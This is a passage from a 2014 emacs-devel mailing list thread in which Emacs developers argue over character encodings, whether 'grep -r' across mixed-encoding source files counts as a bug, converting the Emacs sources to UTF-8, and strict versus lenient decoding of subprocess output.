* Re: Emacs Lisp's future 2014-10-14 7:03 ` Stephen J. Turnbull 2014-10-14 7:41 ` Eli Zaretskii @ 2014-10-14 20:03 ` Paul Eggert 2014-10-15 3:07 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Paul Eggert @ 2014-10-14 20:03 UTC (permalink / raw) To: Stephen J. Turnbull, Eli Zaretskii; +Cc: emacs-devel On 10/14/2014 12:03 AM, Stephen J. Turnbull wrote: > in the Emacs tree "grep -r" > is probably just a bug. Although "grep -r" doesn't conformto POSIX, it is a handy GNU extension, and I use it a lot, both in the Emacs source tree and elsewhere. GNU grep works reasonably well even with text files in the "wrong" encoding, and even with non-text files. I don't expect grep to match UTF-8 patterns to the corresponding EUC-JP text, because I know it doesn't translate. Emacs's M-x grep command supports this usage well, and I don't see how it would be an improvement to call this usage a "bug" or for the Emacs (or grep) default to insist on strict coding correctness here. Eli is correct that UTF-8 is the encoding typically used for text in the Emacs source code. For more about this, please see "Source file encoding" in admin/notes/unicode. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 20:03 ` Paul Eggert @ 2014-10-15 3:07 ` Stephen J. Turnbull 2014-10-15 5:54 ` Paul Eggert 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-15 3:07 UTC (permalink / raw) To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel Paul Eggert writes: > On 10/14/2014 12:03 AM, Stephen J. Turnbull wrote: > > in the Emacs tree "grep -r" > > is probably just a bug. > > Although "grep -r" doesn't conformto POSIX, it is a handy GNU extension, It's not a question of conformance, it's a question of GIGO. As you yourself know: > grep works reasonably well even with text files in the "wrong" encoding, > and even with non-text files. I don't expect grep to match UTF-8 > patterns to the corresponding EUC-JP text, because I know it doesn't > translate. Oh, so you intentionally chose an example where you know it works, and published that on a public mailing list, without warning the kids not to try it at home? Do you realize that although all Japanese computer users occasionally experience mojibake, only a few understand the mechanism and its implications for "simple" operations like grep? I suppose that goes in spades for the Chinese. Consider searching for 元気 to find HELLO, "knowing" that Emacs uses the UTF-8 encoding! > Emacs's M-x grep command supports this usage well, and I don't see how > it would be an improvement to call this usage a "bug" or for the Emacs > (or grep) default to insist on strict coding correctness here. Ah, so you've never lived anywhere but Kansas, Dorothy? There are 1.5 billion[1] Asians who disagree that "grep -r しまった" is well- supported by Emacs or grep in an environment with multiple encodings, which is most of them (except where they've consciously instituted a program of converting legacy documents to a common encoding). That's why the "Japanese patch" is also "the patch that would not die". But that patch is not in any mainline program that I know of, because accurate auto-detection requires knowledge of the target language so it doesn't generalize (the "Japanese patch" assumes that the language is Japanese, so it must be facing ISO-2022-JP, Shift-JIS, or EUC-JP, and relatively recent versions added UTF-8 and BOM detection to that). The patch is not able to distinguish EUC-JP from EUC-CN, for example, in typical use where the designations of character sets to registers is implicit. (Distinguishing Shift-JIS from Big5 is highly but not 100% reliable, and of course distinguishing the language variants of ISO-2022-7 is trivial because the control sequences specify character sets to be installed in the GL register.) > Eli is correct that UTF-8 is the encoding typically used for text > in the Emacs source code. For more about this, please see "Source > file encoding" in admin/notes/unicode. XEmacs made that decision in 1998 (only using ISO-2022-JP). I know how this works. The only difference between us is that I live in Tsukuba, and I've spoken to Handa and Tomita inter alia about these issues over beers (in Japanese as well as in English), and I've read the extremist anti-Unicode tirades (in Japanese). I don't know *why* Dr. Handa sides with those maniacs (they claim that JIS incorporates a mystic Yamato-damashii = "authentic Japanese spirit") although I believe it's out of a genuine desire to support multiculturalism (via his specialty of developing multilingual software). However, like the Japanese patch, detecting culture and choosing font for the same repertoire via encoding is a limited technique. It only works well for Han-using languages. For example, the northern European countries have different notions about positioning of accents, which is apparently noticable to non-native speakers with umlauts. I suspect (though I haven't asked and don't have time to search the library for wordwide newspapers) that the various English-speaking cultures, the French, the Spanish, the Italians, and the Germans have different notions of what constitutes readable or beautiful typography -- it's definitely the case that the ASCII characters in Japanese fonts "look Japanese" (to me, anyway). But good luck choosing fonts based on distinguishing ISO-8859-1 from ISO-8859-1! :-) Dr. Handa's approach to multiculturalism, then, is fundamentally different from that of the engineers and scholars who have evolved Unicode (more precisely, universal coded character sets and the related encoding mechanisms) over the last 30 years or so, not to forget the W3C which has concluded that (as long as conventional glyphs are available for the character repertoire) font choice is purely a presentation issue, and should be handled by markup. Unicode has even deprecated the use of "language tag" characters. They do remain in the repertoire, so could be used to deal with the issues we are discussing. http://www.unicode.org/faq/languagetagging.html http://www.unicode.org/versions/Unicode6.2.0/ch16.pdf#G26419 Note that the language tags are isomorphic to control sequences as used in ISO 2022 (except that being encoded in a block disjoint from graphic characters, they're harder to screw up), so they introduce no text handling issues for Emacs not already present in encodings using ISO 2022 extension techniques. So there you have it. There is *no barrier* to converting *all* files to conformant UTF-8, except a couple hours' hacking to make `help-with-tutorial' and `view-hello-file' recognize language tags.[2] It might be preferable to use a different approach, more conformant to the Unicode/W3C party line, though. Thank you for your persistence. This discussion will greatly inform my future work in XEmacs. (I'm done discussing the issue for Emacs, because I don't expect Dr. Handa -- who is more expert than I -- to change his approach after all these years. This is all just IMHO FWIW YMMV -- and I suspect Dr. Handa counts his "mileage" in kilometers. ;-) Footnotes: [1] I don't know about Indic languages. I'm under the impression that these days they almost universally use Unicode in preference to ISCII and such-like, so they may not have the issue. If that is incorrect, then you can make that 2.5 billion Asians. [2] Note that the limitation of the hack to those functions only is consistent with the Unicode-recommended usage of language tags. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 3:07 ` Stephen J. Turnbull @ 2014-10-15 5:54 ` Paul Eggert 2014-10-15 7:17 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: Paul Eggert @ 2014-10-15 5:54 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: Eli Zaretskii, emacs-devel Stephen J. Turnbull wrote: > you intentionally chose an example where you know it works, and > published that on a public mailing list, without warning the kids not > to try it at home? It's perfectly fine for users to try "M-x grep -r" at home. It's not going to hurt them. It's a common idiom, and lots of people use it every day. > There is *no barrier* to converting *all* files > to conformant UTF-8, except a couple hours' hacking to make > `help-with-tutorial' and `view-hello-file' recognize language tags. I already proposed that for most files, and nobody opposed the idea; see <http://bugs.gnu.org/13936#29>. It's just that nobody has found the "couple hours'" hacking time. Although it's low on my priority list, evidently it's higher on yours; perhaps you can propose a patch? It's not a big deal if you can't; I expect eventually someone will get around to it. > Ah, so you've never lived anywhere but Kansas, Dorothy? I'm well aware of all the problems you mentioned. None of them are valid arguments that it's a "bug" to use "grep -r" in the Emacs source directory. Conversely, it appears that you did not read the file admin/notes/unicode carefully; if you had, you would not be asserting so blithely that there is "no barrier" to converting all Emacs source files to UTF-8. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 5:54 ` Paul Eggert @ 2014-10-15 7:17 ` Stephen J. Turnbull 2014-10-15 9:20 ` Eli Zaretskii 2014-10-15 17:18 ` Paul Eggert 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-15 7:17 UTC (permalink / raw) To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel Paul Eggert writes: > It's perfectly fine for users to try "M-x grep -r" at home. It's > not going to hurt them. That's true for "hurt" == "must call 911". There are very few computer applications where bugs can result in 911 calls, though. That's an awfully low quality standard you have there. > It's a common idiom, and lots of people use it every day. Because they're monolingual English speakers, they can. Others cannot, unless they have an environment where there is a common coded character set used for all textual content. Even an American searching for all instances of the CENT SIGN would be subject to this bug. http://www.thecomicstrips.com/store/add.php?iid=83467 > Conversely, it appears that you did not read the file > admin/notes/unicode carefully; "It appears that you have not studied Unicode carefully", as there is nothing in that file that suggests anything but work is involved in a conversion that loses no character information, since the external coding system utf-8-emacs is available. Even that can be dispensed with, and pure Unicode used, with a little more work (use the PUA, that's what it is there for!) The metadata (language, for which original coded character set is a proxy) can be provided either with a markup language (eg, XML or even HTML) or using Plane 14 tags (but I wrote that already). > if you had, you would not be asserting so blithely that there is > "no barrier" to converting all Emacs source files to UTF-8. I stand corrected. No *technical* barrier. It does require nontrivial work: simply filtering through iconv is not enough. There's also a political barrier: I believe that characters are characters, and may be shared across traditional character set boundaries, and that the presentation layer should specify presentation. Dr. Handa prefers that presentation be encoded in the content. I have no stomach for that argument. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 7:17 ` Stephen J. Turnbull @ 2014-10-15 9:20 ` Eli Zaretskii 2014-10-15 11:34 ` Stephen J. Turnbull 2014-10-15 17:18 ` Paul Eggert 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-15 9:20 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: eggert, emacs-devel > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: Eli Zaretskii <eliz@gnu.org>, > emacs-devel@gnu.org > Date: Wed, 15 Oct 2014 16:17:52 +0900 > > > Conversely, it appears that you did not read the file > > admin/notes/unicode carefully; > > "It appears that you have not studied Unicode carefully", as there is > nothing in that file that suggests anything but work is involved in a > conversion that loses no character information, since the external > coding system utf-8-emacs is available. Even that can be dispensed > with, and pure Unicode used, with a little more work (use the PUA, > that's what it is there for!) utf-8-emacs is a private encoding used and understood by Emacs alone, so encoding Emacs files in that would make them unusable (unsearchable, unreadable, etc.) with anything but Emacs. As for using PUA, you have been told just a few days ago why this is not going to work with Emacs. > The metadata (language, for which original coded character set is a > proxy) can be provided either with a markup language (eg, XML or even > HTML) or using Plane 14 tags (but I wrote that already). It is easy to suggest such major endeavors to other projects in which you have no intention to become involved. From the Emacs side, this would be a terrible waste of resources, since the "problem" is already solved in Emacs by other means, which work well, based on several years of real-life experience. > > if you had, you would not be asserting so blithely that there is > > "no barrier" to converting all Emacs source files to UTF-8. > > I stand corrected. No *technical* barrier. It does require > nontrivial work: simply filtering through iconv is not enough. > > There's also a political barrier: I believe that characters are > characters, and may be shared across traditional character set > boundaries, and that the presentation layer should specify > presentation. Dr. Handa prefers that presentation be encoded in the > content. I have no stomach for that argument. The statement that UTF-8 is a de-facto Emacs "locale" still stands. And so having Emacs behave in a way that makes it easy to work with these files, including those few that for various reasons are encoded differently, is still a valuable feature. Your argument that Emacs files have no single encoding and therefore there's no reasonable way to support them is struck down. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 9:20 ` Eli Zaretskii @ 2014-10-15 11:34 ` Stephen J. Turnbull 2014-10-15 11:57 ` David Kastrup 2014-10-15 12:32 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-15 11:34 UTC (permalink / raw) To: Eli Zaretskii; +Cc: eggert, emacs-devel Eli Zaretskii writes: > utf-8-emacs is a private encoding used and understood by Emacs > alone, so encoding Emacs files in that would make them unusable > (unsearchable, unreadable, etc.) with anything but Emacs. And who in the world would care? They're *all* Emacs Lisp source code, not even documentation. They're all in languages whose scripts are in Unicode. So most of the characters will be ASCII, most of the rest will be in Unicode, and the few that aren't, you can probably forget about reading or writing in any environment but Emacs or an extremely idiosyncratic one that isn't good for anything except reading and writing old Tibetan or Sanskrit encodings (but not both). > As for using PUA, you have been told just a few days ago why this is > not going to work with Emacs. That is a bet I will eventually take you up on. It may not be going to work in Emacs, ever, but I bet I can make it work in XEmacs. :-) > Your argument that Emacs files have no single encoding and > therefore there's no reasonable way to support them is struck down. I never made such an argument. My argument is that Emacs is alone in choosing this particular "reasonable way to support encodings", and that makes it difficult to cooperate with other projects ... such as Guile. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 11:34 ` Stephen J. Turnbull @ 2014-10-15 11:57 ` David Kastrup 2014-10-15 12:32 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-15 11:57 UTC (permalink / raw) To: emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > I never made such an argument. My argument is that Emacs is alone in > choosing this particular "reasonable way to support encodings", and > that makes it difficult to cooperate with other projects ... such as > Guile. "cooperate with" and "meld with" tend to raise substantially different issues. Emacs is perfectly well equipped to cooperate with a lot of other projects not least of all because of its unusually diverse support of encodings. But of course it is a perfect nightmare to reimplement Emacs on the basis of a system with a less polymorphic history. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 11:34 ` Stephen J. Turnbull 2014-10-15 11:57 ` David Kastrup @ 2014-10-15 12:32 ` Eli Zaretskii 2014-10-15 13:22 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-15 12:32 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: eggert, emacs-devel > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: eggert@cs.ucla.edu, > emacs-devel@gnu.org > Date: Wed, 15 Oct 2014 20:34:31 +0900 > > Eli Zaretskii writes: > > > utf-8-emacs is a private encoding used and understood by Emacs > > alone, so encoding Emacs files in that would make them unusable > > (unsearchable, unreadable, etc.) with anything but Emacs. > > And who in the world would care? Those who use Grep etc. outside of Emacs. > My argument is that Emacs is alone in choosing this particular > "reasonable way to support encodings" What other programs you are aware of that cover such a large set of scripts and languages no matter what is the user locale? > and that makes it difficult to cooperate with other projects > ... such as Guile. My point is that those other projects need to learn from Emacs first. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 12:32 ` Eli Zaretskii @ 2014-10-15 13:22 ` Stephen J. Turnbull 2014-10-15 14:36 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-15 13:22 UTC (permalink / raw) To: Eli Zaretskii; +Cc: eggert, emacs-devel Eli Zaretskii writes: > > > utf-8-emacs is a private encoding used and understood by Emacs > > > alone, so encoding Emacs files in that would make them unusable > > > (unsearchable, unreadable, etc.) with anything but Emacs. > > > > And who in the world would care? > > Those who use Grep etc. outside of Emacs. Well, no, because only those with a very special and very obsolete environment would be able to search for those few characters using grep, if they don't have Emacs. The rest of the characters are in Unicode, so can be searched as usual using the UTF-8 representation. > > My argument is that Emacs is alone in choosing this particular > > "reasonable way to support encodings" > > What other programs you are aware of that cover such a large set of > scripts and languages no matter what is the user locale? With Unicode support, *all of them*. (Note: I didn't change from encodings to "scripts and languages", you did.) Of course, very few handle all of the *character encodings* that Emacs does, but iconv and recode come close, or perhaps even exceed Emacs in some areas. Those programs, plus a little shell (oops, you're on Windows, OK, *Python*), and you can do 99.44% of what Emacs can do as far as handling file coding. True, Emacs is a little more convenient in handling file coding, but the majority of folks evidently think that is far outweighed by the inconvenience of Emacs itself. > My point is that those other projects need to learn from Emacs first. Could be you're right, but sadly, I doubt anyone is going to bother. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 13:22 ` Stephen J. Turnbull @ 2014-10-15 14:36 ` Eli Zaretskii 2014-10-15 14:51 ` David Kastrup 2014-10-15 16:57 ` Stephen J. Turnbull 0 siblings, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-15 14:36 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: eggert, emacs-devel > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: eggert@cs.ucla.edu, > emacs-devel@gnu.org > Date: Wed, 15 Oct 2014 22:22:26 +0900 > > Eli Zaretskii writes: > > > > > utf-8-emacs is a private encoding used and understood by Emacs > > > > alone, so encoding Emacs files in that would make them unusable > > > > (unsearchable, unreadable, etc.) with anything but Emacs. > > > > > > And who in the world would care? > > > > Those who use Grep etc. outside of Emacs. > > Well, no, because only those with a very special and very obsolete > environment would be able to search for those few characters using > grep, if they don't have Emacs. The rest of the characters are in > Unicode, so can be searched as usual using the UTF-8 representation. You assume that Grep and the terminal will not choke on the non-Unicode characters. There's no basis for such an assumption. > > > My argument is that Emacs is alone in choosing this particular > > > "reasonable way to support encodings" > > > > What other programs you are aware of that cover such a large set of > > scripts and languages no matter what is the user locale? > > With Unicode support, *all of them*. Treating UTF-8 as a byte stream doesn't constitute "support". > > My point is that those other projects need to learn from Emacs first. > > Could be you're right, but sadly, I doubt anyone is going to bother. Too bad. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 14:36 ` Eli Zaretskii @ 2014-10-15 14:51 ` David Kastrup 2014-10-15 16:57 ` Stephen J. Turnbull 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-15 14:51 UTC (permalink / raw) To: emacs-devel Eli Zaretskii <eliz@gnu.org> writes: >> From: "Stephen J. Turnbull" <stephen@xemacs.org> >> Eli Zaretskii writes: > >> > My point is that those other projects need to learn from Emacs first. >> >> Could be you're right, but sadly, I doubt anyone is going to bother. > > Too bad. With regard to GUILE, not learning from Emacs before taking over its multilingual support is not really much of an option. I rather doubt that the current "fair is foul, and foul is fair" chants will be sufficient for convincing existing users to abandon the evil encodings they have been comfortable dabbling in so far due to the forbidden arts of Emacs. "Be thankful you can no longer avail yourself of this tool for this purpose" works better in religious settings. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 14:36 ` Eli Zaretskii 2014-10-15 14:51 ` David Kastrup @ 2014-10-15 16:57 ` Stephen J. Turnbull 1 sibling, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-15 16:57 UTC (permalink / raw) To: Eli Zaretskii; +Cc: eggert, emacs-devel Eli Zaretskii writes: > You assume that Grep and the terminal will not choke on the > non-Unicode characters. There's no basis for such an assumption. No basis at all. But that's not what I'm assuming. Just like you (and Emacs itself, which already has several files containing such non-Unicode characters), I'm simply assuming that GIGO will cause no harm. The difference is that in the longer run I plan to remove the problem by using the PUA, which you say can't be done in Emacs. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 7:17 ` Stephen J. Turnbull 2014-10-15 9:20 ` Eli Zaretskii @ 2014-10-15 17:18 ` Paul Eggert 2014-10-15 18:39 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Paul Eggert @ 2014-10-15 17:18 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: Eli Zaretskii, emacs-devel On 10/15/2014 12:17 AM, Stephen J. Turnbull wrote: > > It's perfectly fine for users to try "M-x grep -r" at home. It's > > not going to hurt them. > > That's true for "hurt" == "must call 911". It's not going to trash their files, or corrupt their displays, or steal their passwords, or do anything that's going to hurt them. Let's not be fearmongers here. The current behavior is useful and easy to explain and understand, and people use it a lot, and in that sense it is not a "bug". Although the behavior could be changed to better handle the use cases you're thinking about, that is a different matter, one that would require nontrivial work to do, and one that shouldn't obstruct the common current usage. > > > Conversely, it appears that you did not read the file > > admin/notes/unicode carefully; > > "It appears that you have not studied Unicode carefully", as there is > nothing in that file that suggests anything but work is involved Nontrivial work needs to be done, and this is a technical barrier as nobody (including you) has had the time to do the work. It does still appear, though, that you haven't read admin/notes/unicode carefully enough, as a simple language-tag-per-file approach won't suffice for src/msdos.c, etc/HELLO, lisp/language/tibetan.el, etc., and still more work would need to be done for those files, the details of which have never (as far as I know) been discussed. It's not clear how my studying Unicode more carefully would help in that effort. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 17:18 ` Paul Eggert @ 2014-10-15 18:39 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-15 18:39 UTC (permalink / raw) To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel Paul Eggert writes: > The current behavior is useful and easy to explain and understand, > and people use it a lot, Granted. > and in that sense it is not a "bug". I give up. I can't imagine successfully communicating with someone who defines "not a bug" that way. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 5:35 ` Stephen J. Turnbull 2014-10-13 6:02 ` Eli Zaretskii 2014-10-13 14:55 ` Paul Eggert @ 2014-10-14 2:11 ` Richard Stallman 2 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-14 2:11 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Speaking only for myself, no, I mean all octet streams purported to be encoded text, network or local. We can't do that. That would be intolerable for users, for the reasons others have explained. However, the examples people have offered mostly include working in pipelines with network services. Those cases involve noninteractive processing and using the network. It would be ok in those cases to be more strict about decoding. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 3:10 ` Richard Stallman 2014-10-13 5:35 ` Stephen J. Turnbull @ 2014-10-13 5:43 ` Eli Zaretskii 2014-10-14 2:09 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-13 5:43 UTC (permalink / raw) To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Sun, 12 Oct 2014 23:10:11 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org, > dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, > monnier@iro.umontreal.ca, stephen@xemacs.org > > > And, of course, when you invoke a program locally, there's usually no > > protocol at all involved. > > > > Likewise, we need to look at some real cases. > > Not sure what you mean by that. M-! and M-| is what I had in mind. > > This may be a big miscommunication. I think the people who want > strict encoding are talking about network communication using > open-network-stream. That distinction is quite blurred in latest Emacs versions. E.g., shell-command-to-string might call a process on a remote host and communicate with it via open-network-stream or some such. There are several interactive commands already that use this feature. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 5:43 ` Eli Zaretskii @ 2014-10-14 2:09 ` Richard Stallman 2014-10-14 6:24 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-14 2:09 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] That distinction is quite blurred in latest Emacs versions. E.g., shell-command-to-string might call a process on a remote host and communicate with it via open-network-stream or some such. There are several interactive commands already that use this feature. The cases where their arguments for strictness are strongest are the noninteractive ones that don't show the text to a user for editing. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 2:09 ` Richard Stallman @ 2014-10-14 6:24 ` Eli Zaretskii 2014-10-14 7:48 ` David Kastrup 2014-10-15 13:16 ` Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-14 6:24 UTC (permalink / raw) To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Mon, 13 Oct 2014 22:09:37 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org, > dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, > monnier@iro.umontreal.ca, stephen@xemacs.org > > That distinction is quite blurred in latest Emacs versions. E.g., > shell-command-to-string might call a process on a remote host and > communicate with it via open-network-stream or some such. There are > several interactive commands already that use this feature. > > The cases where their arguments for strictness are strongest > are the noninteractive ones that don't show the text to a user > for editing. I believe the commands that use shell-command-to-string are a good example of these cases. That function is frequently used as infrastructure to query an external program about something, and the result is then used, at least in some cases, to decide how to proceed. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 6:24 ` Eli Zaretskii @ 2014-10-14 7:48 ` David Kastrup 2014-10-15 13:16 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-14 7:48 UTC (permalink / raw) To: Eli Zaretskii Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> Date: Mon, 13 Oct 2014 22:09:37 -0400 >> From: Richard Stallman <rms@gnu.org> >> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org, >> dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, >> monnier@iro.umontreal.ca, stephen@xemacs.org >> >> That distinction is quite blurred in latest Emacs versions. E.g., >> shell-command-to-string might call a process on a remote host and >> communicate with it via open-network-stream or some such. There are >> several interactive commands already that use this feature. >> >> The cases where their arguments for strictness are strongest >> are the noninteractive ones that don't show the text to a user >> for editing. > > I believe the commands that use shell-command-to-string are a good > example of these cases. That function is frequently used as > infrastructure to query an external program about something, and the > result is then used, at least in some cases, to decide how to proceed. And treating undecodable bytes different from other input regarding verification/sanitizing is going to make things more secure just how? I should have thought that using several different mechanisms here is going to increase rather than decrease the number of possible attack vectors. Or is the idea that any application is safe to be called as long as we don't carry more than 200ml of liquids -- sorry, wrong security theatre. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-14 6:24 ` Eli Zaretskii 2014-10-14 7:48 ` David Kastrup @ 2014-10-15 13:16 ` Richard Stallman 2014-10-15 14:32 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-15 13:16 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] I believe the commands that use shell-command-to-string are a good example of these cases. That function is frequently used as infrastructure to query an external program about something, and the result is then used, at least in some cases, to decide how to proceed. 1. The scenario we've been told about is where the invalid UTF-8 gets passed on to some other program. I don't think any harm will come if Emacs itself looks at the output of the command. Emacs does not generally get confused by raw bytes. 2. It would not be hard to make another function (which does strict decoding) to recommend instead of shell-command-to-string for use in Lisp code in certain cases. 3. It would be easy enough to make shell-command-to-string do flexible decoding when called interactively and do strict decoding when called noninteractively -- controlled through an optional argument. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 13:16 ` Richard Stallman @ 2014-10-15 14:32 ` Eli Zaretskii 2014-10-15 14:43 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-15 14:32 UTC (permalink / raw) To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Wed, 15 Oct 2014 09:16:20 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org, > dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, > monnier@iro.umontreal.ca, stephen@xemacs.org > > I believe the commands that use shell-command-to-string are a good > example of these cases. That function is frequently used as > infrastructure to query an external program about something, and the > result is then used, at least in some cases, to decide how to proceed. > > 1. The scenario we've been told about is where the invalid UTF-8 gets > passed on to some other program. I don't think any harm will come if > Emacs itself looks at the output of the command. Emacs does not > generally get confused by raw bytes. What Emacs gets from a program it can as easily send to another (or the same one). > 2. It would not be hard to make another function (which does strict > decoding) to recommend instead of shell-command-to-string for use in > Lisp code in certain cases. > > 3. It would be easy enough to make shell-command-to-string do flexible > decoding when called interactively and do strict decoding when called > noninteractively -- controlled through an optional argument. I envision complaints from users if we do that. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 14:32 ` Eli Zaretskii @ 2014-10-15 14:43 ` David Kastrup 2014-10-16 18:12 ` Richard Stallman 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-15 14:43 UTC (permalink / raw) To: Eli Zaretskii Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> Date: Wed, 15 Oct 2014 09:16:20 -0400 >> From: Richard Stallman <rms@gnu.org> >> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org, >> dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, >> monnier@iro.umontreal.ca, stephen@xemacs.org >> >> I believe the commands that use shell-command-to-string are a good >> example of these cases. That function is frequently used as >> infrastructure to query an external program about something, and the >> result is then used, at least in some cases, to decide how to proceed. >> >> 1. The scenario we've been told about is where the invalid UTF-8 gets >> passed on to some other program. I don't think any harm will come if >> Emacs itself looks at the output of the command. Emacs does not >> generally get confused by raw bytes. > > What Emacs gets from a program it can as easily send to another (or > the same one). > >> 2. It would not be hard to make another function (which does strict >> decoding) to recommend instead of shell-command-to-string for use in >> Lisp code in certain cases. >> >> 3. It would be easy enough to make shell-command-to-string do flexible >> decoding when called interactively and do strict decoding when called >> noninteractively -- controlled through an optional argument. > > I envision complaints from users if we do that. Sounds like a recipe for 